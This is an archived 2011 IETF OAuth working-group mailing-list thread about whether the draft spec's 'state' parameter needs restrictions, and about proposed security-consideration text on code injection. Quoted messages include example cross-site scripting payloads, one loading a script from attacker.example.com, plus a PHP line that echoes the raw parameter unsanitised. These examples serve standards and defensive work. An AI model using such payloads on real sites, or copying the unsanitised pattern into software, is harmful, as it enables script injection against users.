Re: [OAUTH-WG] OAuth v2-18 comment on "state" parameter
Aiden Bell <aiden449@gmail.com> Mon, 25 July 2011 09:37 UTC
Return-Path: <aiden449@gmail.com>
X-Original-To: oauth@ietfa.amsl.com
Delivered-To: oauth@ietfa.amsl.com
Received: from localhost (localhost [127.0.0.1]) by ietfa.amsl.com (Postfix) with ESMTP id 0F30D21F8B2D for <oauth@ietfa.amsl.com>; Mon, 25 Jul 2011 02:37:44 -0700 (PDT)
X-Virus-Scanned: amavisd-new at amsl.com
X-Spam-Flag: NO
X-Spam-Score: -2.137
X-Spam-Level:
X-Spam-Status: No, score=-2.137 tagged_above=-999 required=5 tests=[AWL=-0.674, BAYES_00=-2.599, FRT_STRONG2=1.535, HTML_MESSAGE=0.001, J_CHICKENPOX_45=0.6, RCVD_IN_DNSWL_LOW=-1]
Received: from mail.ietf.org ([64.170.98.30]) by localhost (ietfa.amsl.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id ZbUet82PXJTy for <oauth@ietfa.amsl.com>; Mon, 25 Jul 2011 02:37:42 -0700 (PDT)
Received: from mail-qw0-f44.google.com (mail-qw0-f44.google.com [209.85.216.44]) by ietfa.amsl.com (Postfix) with ESMTP id A51F921F8B2C for <oauth@ietf.org>; Mon, 25 Jul 2011 02:37:41 -0700 (PDT)
Received: by qwc23 with SMTP id 23so3041646qwc.31 for <oauth@ietf.org>; Mon, 25 Jul 2011 02:37:41 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; bh=w8jSdksTr68GgxOvXNmmQMmosS2VMvKXWFNsbEnpwAg=; b=riKeB9nvkXzgB6jinhRm3gwqElEPFer4lnsJnt9AR/FAKQsnRQJAByeKEVVcLCbkmY XcVnphdSl/LVhm+5i9oSPJlHKYW1ogIGApNxilgI/02P/DccvkXfdBmQRhhtoFN7xVf3 1FhJCxCTO2imvwdZvyU32CobbjfxIJKS2hHkk=
MIME-Version: 1.0
Received: by 10.229.59.68 with SMTP id k4mr3158787qch.237.1311586659771; Mon, 25 Jul 2011 02:37:39 -0700 (PDT)
Received: by 10.229.14.42 with HTTP; Mon, 25 Jul 2011 02:37:39 -0700 (PDT)
In-Reply-To: <90C41DD21FB7C64BB94121FBBC2E72345021F378B7@P3PW5EX1MB01.EX1.SECURESERVER.NET>
References: <CADrOfLJSd8Z=QfCcGUdFBU314rmjv9-u25Vta+ObXfNAwoA06w@mail.gmail.com> <4E22B021.7080009@cisco.com> <90C41DD21FB7C64BB94121FBBC2E7234501D6E0656@P3PW5EX1MB01.EX1.SECURESERVER.NET> <CAGHdeD711qcuZiJ6C8miMNfTW1iDTvqG1KKrEZrWsM2Mxxs3WA@mail.gmail.com> <CADrOfLJd7jtfJGBwxaX1bQHN-Ow=T-kGLTgOWw0rR1cYGCpzog@mail.gmail.com> <90C41DD21FB7C64BB94121FBBC2E72345020652CA4@P3PW5EX1MB01.EX1.SECURESERVER.NET> <CADrOfLJLe_JdGZTWdSGLvXySbh==3oNuYJHQRPWL+RsN9b6AAA@mail.gmail.com> <90C41DD21FB7C64BB94121FBBC2E72345020652CE2@P3PW5EX1MB01.EX1.SECURESERVER.NET> <CA+5SmTVi7z=sGc1+6q0FhiAsRpssDYqciH6KoPf_ukgcTHBmWg@mail.gmail.com> <90C41DD21FB7C64BB94121FBBC2E72345020652D1E@P3PW5EX1MB01.EX1.SECURESERVER.NET> <CA+5SmTXa8cgX23E_TNT07fYREqPqZXwiMEhu+-bG+Ekf03kzTQ@mail.gmail.com> <90C41DD21FB7C64BB94121FBBC2E72345021F378B7@P3PW5EX1MB01.EX1.SECURESERVER.NET>
Date: Mon, 25 Jul 2011 10:37:39 +0100
Message-ID: <CA+5SmTXe7=U=xa3n0t6MOGKE1uX=0zSk58FMMJUoPXBqTYbCdg@mail.gmail.com>
From: Aiden Bell <aiden449@gmail.com>
To: Eran Hammer-Lahav <eran@hueniverse.com>
Content-Type: multipart/alternative; boundary="0016e64dda1af2a65504a8e190a1"
Cc: OAuth WG <oauth@ietf.org>
Subject: Re: [OAUTH-WG] OAuth v2-18 comment on "state" parameter
X-BeenThere: oauth@ietf.org
X-Mailman-Version: 2.1.12
Precedence: list
List-Id: OAUTH WG <oauth.ietf.org>
List-Unsubscribe: <https://www.ietf.org/mailman/options/oauth>, <mailto:oauth-request@ietf.org?subject=unsubscribe>
List-Archive: <http://www.ietf.org/mail-archive/web/oauth>
List-Post: <mailto:oauth@ietf.org>
List-Help: <mailto:oauth-request@ietf.org?subject=help>
List-Subscribe: <https://www.ietf.org/mailman/listinfo/oauth>, <mailto:oauth-request@ietf.org?subject=subscribe>
X-List-Received-Date: Mon, 25 Jul 2011 09:37:44 -0000
Sounds good Eran On 25 July 2011 07:37, Eran Hammer-Lahav <eran@hueniverse.com> wrote: > This seems too verbose, considering how fundamental input validation is in > general.**** > > ** ** > > I added the following to a new section:**** > > ** ** > > A code injection attack occurs when an input or otherwise > external variable is used by an**** > > application in which that input can cause modification of the > application logic when used**** > > unsanitized. This may allow an attacker to gain access to the > application device or its**** > > data, cause denial of service, or a wide range of malicious > side-effects.**** > > </t>**** > > <t>**** > > The Authorization server and client MUST validate and sanitize > any value received, and in**** > > particular, the value of the ‘state’ and ‘redirect_uri’ > parameters.**** > > ** ** > > EHL**** > > ** ** > > ** ** > > ** ** > > *From:* oauth-bounces@ietf.org [mailto:oauth-bounces@ietf.org] *On Behalf > Of *Aiden Bell > *Sent:* Wednesday, July 20, 2011 12:04 PM > *To:* OAuth WG > > *Subject:* Re: [OAUTH-WG] OAuth v2-18 comment on "state" parameter**** > > ** ** > > See below for revision, tried to follow the "introduction, recommendation, > example" > structure in 10.12 "Cross-site Request Forgery" and shorten my text. > > I'm strugging to make it clear that any internal modification to the > 'state' parameter > must not affect the re-transmitted value of 'state' in Authorization > Response / Error > Response when it originates from the authorisation server. > > ---**** > > > Security Consideration: Code Injection Attacks**** > > Code injection attacks are when an input or otherwise external variable is > used within > an application where that input can cause modification of application logic > when unsanitised. This may allow an attacker to gain access to client or > user data, > cause Denial of Service or a wide range of malicious side-effects.**** > > > > Incorrect validation or sanitation of the 'state' parameter from section > 4.1.2 could lead to code > injection. Both client and server SHOULD ensure that the "state" parameter > described**** > > in section 4.1.2 is correctly sanitised for internal processing, storage or > output outside the > scope of the OAuth protocol. > > Failure to correctly sanitise the 'state' parameter can cause code > injection attacks even if a > cryptographically secure extension such as [I-D.ietf-oauth-v2-http-mac] is > used. > > As an example, a malicious person may create a fake Error Response as > described in section > 4.1.2.1 containing a maliciously crafted state parameter. The following > request would be sent to > the client: > > > https://client.example.com/cb?error=access_denied&state=%3Cscript%20type%3D%22text%2Fjavascript%22%20src%3D%22http%3A%2F%2Fattacker.example.com%2Fmalicious.js%22%20%2F%3E > > Insecure transfer of the decoded value into the HTML buffer of the client > application > may result in the injection of code into the user agent of the end user, > possibly compromising data. > This example attack can be mitigated by sanitising the 'state' parameter to > remove or escape HTML > syntax before interpolation of the value into server output to the user > agent. > > --end--**** > > On 20 July 2011 19:40, Eran Hammer-Lahav <eran@hueniverse.com> wrote:**** > > Take a look at how the other sections in the draft setup the premise first > and give a quick explanation of the attack…**** > > **** > > EHL**** > > **** > > *From:* Aiden Bell [mailto:aiden449@gmail.com] > *Sent:* Wednesday, July 20, 2011 11:38 AM > *To:* Eran Hammer-Lahav; OAuth WG**** > > > *Subject:* Re: [OAUTH-WG] OAuth v2-18 comment on "state" parameter**** > > **** > > Been following this discussion > > I'll propose some text, though it seems to me it is getting into the realm > of "Don't trust inputs" > > It is also worth noting that signing the request using something like the > HMAC extension elevates any > problems where you DO need to evaluate the state parameter in some way > where the evaluation process > is too complex to secure (DSLs and languages in state, which is really ugly > but, someone may do it). > > Really though, just seems like general application security advice rather > than OAuth specific > > Security Consideration: Code Injection Attacks > > Incorrect validation or sanitation of the 'state' parameter from section > 4.1.2 could lead to code > injection. > > Both client and server SHOULD ensure that the "state" parameter described > in section 4.1.2 is correctly validated, escaped or sanitised prior to > processing for their application's > requirements. Modifications, for security or otherwise to the 'state' > variable contained in the Authorization Request by the > authorization server will not be transmitted to the client in the > Authorization Response or Error Response > as the response 'state' value MUST be identical to the value in the > request. > > If the 'state' parameter passed between client and server contains a value > which is interpreted or > otherwise placed into a context that requires evaluation of the unmodified > value then a cryptographic > scheme such as that defined in [I-D.ietf-oauth-v2-http-mac] should be used > to verify request authenticity. > It should be noted however than a cryptographically authentic request may > still contain malicious > code if the client or server integrity can not be established and trusted. > > As an example, a malicious person may create a fake Error Response as > described in section > 4.1.2.1 containing a maliciously crafted state parameter. The following > request would be sent to > the client: > > > https://client.example.com/cb?error=access_denied&state=%3Cscript%20type%3D%22text%2Fjavascript%22%20src%3D%22http%3A%2F%2Fattacker.example.com%2Fmalicious.js%22%20%2F%3E > > Insecure transfer of the decoded value into the HTML buffer of the client > application > may result in the injection of code into the user agent of the end user, > possibly compromising data. > This example attack can be mitigated by sanitising the 'state' parameter to > remove or escape HTML > syntax before interpolation of the value into server output to the user > agent. > > --end-- > > Not claiming it is good, well written or concise ... but it is proposed. > Even if it is rejected, feedback > would be appreciated. > > Thanks, > Aiden**** > > On 20 July 2011 18:36, Eran Hammer-Lahav <eran@hueniverse.com> wrote:**** > > I think most of your description isn't very relevant to this particular > attack. I'll skip to the part where the legitimate client gets a maliciously > modified state parameter value. > > Your concern seems to be a simple code injection attack (e.g. that some > clients will not properly protect their code from invalid state values). For > example, a client may use state to pass a JSON string and when it receives > it back, calls eval() on the raw state value or even JSON.parse without > catching exceptions. > > The right way to address this is to add a new security consideration > section discussion the various Injection Attacks possible. Using state to > include malicious code is one. Another is code injection in the redirect_uri > by a malicious client to an authorization server supporting dynamic > redirection URIs. > > Then of course, there really is no need for any elaborate setup for anyone > to send requests to the client redirection URI endpoint directly (without > following any of the flow). In such a case, the enforcement of safe state > values by the authorization server will accomplish nothing if the client > doesn't perform its own validation (and we're back to square one). In other > words, I can call any endpoint on the client with any malicious parameters > and try to break it. > > But even if you perform input validation on the client side, which should > prevent a code injection attack, you are still open to other malicious > manipulation of the state parameter. For example, a naïve client can use the > state parameter to pass a user id so that when the redirection callback is > called, it can link the access token to that account. That of course, would > be a very bad thing (tm) without some protection (e.g. state cookie) which > the client can use to validate the state value. > > In short, over specification does not solve ignorance. We can and should > highlight the possible code injection attacks on both the client and > authorization server, as well as other security concerns around the state > parameter. But at the end, it is up to both the client and authorization > server developers to build secure applications. > > So, anyone volunteering to propose text?**** > > > EHL > > > > -----Original Message----- > > From: bigbadbob0@gmail.com [mailto:bigbadbob0@gmail.com] On Behalf Of > > Bob Van Zant**** > > > Sent: Wednesday, July 20, 2011 9:29 AM > > To: Eran Hammer-Lahav > > Cc: Breno; OAuth WG**** > > > Subject: Re: [OAUTH-WG] OAuth v2-18 comment on "state" parameter > > > > The problem lies in the inherent trust of the state parameter. The naive > > client application developer assumes that state goes out to the > authorization > > server and comes back unchanged; because that's what the spec says will > > happen. > > > > As a malicious person I use the client application and steal the client > id when > > I'm redirected to the authorization server. > > > > I then craft my own authorization URL pretending to act on behalf of the > > client application. > > > > http://example.com/oauth/authorize?client_id=deadbeef&response_type= > > code&state=%3Cscript%3Ealert%28%22omg%22%29%3B%3C%2Fscript%3E > > > > I send that out to unsuspecting people. Those people are sent to my site; > > maybe they trust it. The site is asking them to authorize an application > they > > perhaps they're familiar with. So they do. > > > > Now the assumption, and it's really not much of a leap of faith, is that > some > > client developer is going to take that state variable and put it directly > into > > their site. In PHP it could be something silly > > like: > > > > Thanks for authorizing our app, $_GET["state"]. > > > > Chrome protects me from this basic attack (I just inserted it into one of > my > > demos): Refused to execute a JavaScript script. Source code of script > found > > within request. Other browsers won't. Real attackers are more creative > than > > me. > > > > -Bob > > > > > > > > > > > > On Wed, Jul 20, 2011 at 9:11 AM, Eran Hammer-Lahav > > <eran@hueniverse.com> wrote: > > > Can you provide examples of bad values and how they make the > > implementation less secure? What's the attack vector here? > > > > > > EHL > > > > > >> -----Original Message----- > > >> From: bigbadbob0@gmail.com [mailto:bigbadbob0@gmail.com] On Behalf > > Of > > >> Bob Van Zant > > >> Sent: Wednesday, July 20, 2011 9:10 AM > > >> To: Breno; Eran Hammer-Lahav > > >> Cc: OAuth WG > > >> Subject: Re: [OAUTH-WG] OAuth v2-18 comment on "state" parameter > > >> > > >> I think somewhere in here my original comments got lost. The spec, as > > >> written, provides no limitations on what can go in the state variable. > > >> If we don't define those limitations in the spec implementors are > > >> going to define their own limitations (I'm on the verge of doing it > myself). > > >> > > >> I propose that the state variable be limited to the set of characters > > >> [a-zA-Z0- 9_-] and be restricted to a maximum length of 150 > characters. > > >> It's simple, doesn't require URL encoding, and will be hard for a > > >> client application to turn into a vulnerability. It provides plenty > > >> of uniqueness (it can fit a sha512) for even the largest and most used > > client applications. > > >> > > >> -Bob > > >> > > >> > > >> On Wed, Jul 20, 2011 at 8:24 AM, Breno <breno.demedeiros@gmail.com> > > >> wrote: > > >> > > > >> > > > >> > On Mon, Jul 18, 2011 at 11:32 PM, Eran Hammer-Lahav > > >> > <eran@hueniverse.com> > > >> > wrote: > > >> >> > > >> >> > > >> >> > -----Original Message----- > > >> >> > From: oauth-bounces@ietf.org [mailto:oauth-bounces@ietf.org] On > > >> >> > Behalf Of Eliot Lear > > >> >> > Sent: Sunday, July 17, 2011 2:49 AM > > >> >> > > >> >> > One other point: if the redirection_uri can have fragments and > > >> >> > can be provided, why is state necessary? > > >> >> > > >> >> First, I assume you mean query instead of fragment. > > >> >> > > >> >> This was discussed on the list about a year ago. There isn't a > > >> >> requirement to support both dynamic redirection URIs as well as a > > >> >> special state parameter. However, the state parameter provides a > > >> >> better way to allow customization of the redirection request > > >> >> alongside full registration of the redirection URI. Section 3.1.2 > > >> >> recommends using the state parameter over changing the redirection > > >> >> URI > > >> itself. > > >> >> > > >> >> Using state is much simpler because the authorization server does > > >> >> not have to implement potentially insecure URI comparison > > >> >> algorithms for dynamic redirection URIs. > > >> > > > >> > Agree -- for instance, Google's provider doesn't allow arbitrary > > >> > dynamic specification of query or fragment parameters in redirect > > >> > URIs, for instance, due largely to security considerations. > > >> > > > >> >> > > >> >> EHL > > >> >> _______________________________________________ > > >> >> OAuth mailing list > > >> >> OAuth@ietf.org > > >> >> https://www.ietf.org/mailman/listinfo/oauth > > >> > > > >> > > > >> > > > >> > -- > > >> > Breno de Medeiros > > >> > > > >> > > > > > _______________________________________________ > OAuth mailing list > OAuth@ietf.org > https://www.ietf.org/mailman/listinfo/oauth**** > > > > > -- > ------------------------------------------------------------------ > Never send sensitive or private information via email unless it is > encrypted. http://www.gnupg.org**** > > > > > -- > ------------------------------------------------------------------ > Never send sensitive or private information via email unless it is > encrypted. http://www.gnupg.org**** > -- ------------------------------------------------------------------ Never send sensitive or private information via email unless it is encrypted. http://www.gnupg.org
- [OAUTH-WG] OAuth v2-18 comment on "state" paramet… Bob Van Zant
- Re: [OAUTH-WG] OAuth v2-18 comment on "state" par… Eran Hammer-Lahav
- Re: [OAUTH-WG] OAuth v2-18 comment on "state" par… Bob Van Zant
- Re: [OAUTH-WG] OAuth v2-18 comment on "state" par… Eliot Lear
- Re: [OAUTH-WG] OAuth v2-18 comment on "state" par… Bob Van Zant
- Re: [OAUTH-WG] OAuth v2-18 comment on "state" par… Eran Hammer-Lahav
- Re: [OAUTH-WG] OAuth v2-18 comment on "state" par… Breno
- Re: [OAUTH-WG] OAuth v2-18 comment on "state" par… Bob Van Zant
- Re: [OAUTH-WG] OAuth v2-18 comment on "state" par… Eran Hammer-Lahav
- Re: [OAUTH-WG] OAuth v2-18 comment on "state" par… Bob Van Zant
- Re: [OAUTH-WG] OAuth v2-18 comment on "state" par… Eran Hammer-Lahav
- Re: [OAUTH-WG] OAuth v2-18 comment on "state" par… Bob Van Zant
- Re: [OAUTH-WG] OAuth v2-18 comment on "state" par… Aiden Bell
- Re: [OAUTH-WG] OAuth v2-18 comment on "state" par… Eran Hammer-Lahav
- Re: [OAUTH-WG] OAuth v2-18 comment on "state" par… Aiden Bell
- Re: [OAUTH-WG] OAuth v2-18 comment on "state" par… Eran Hammer-Lahav
- Re: [OAUTH-WG] OAuth v2-18 comment on "state" par… Aiden Bell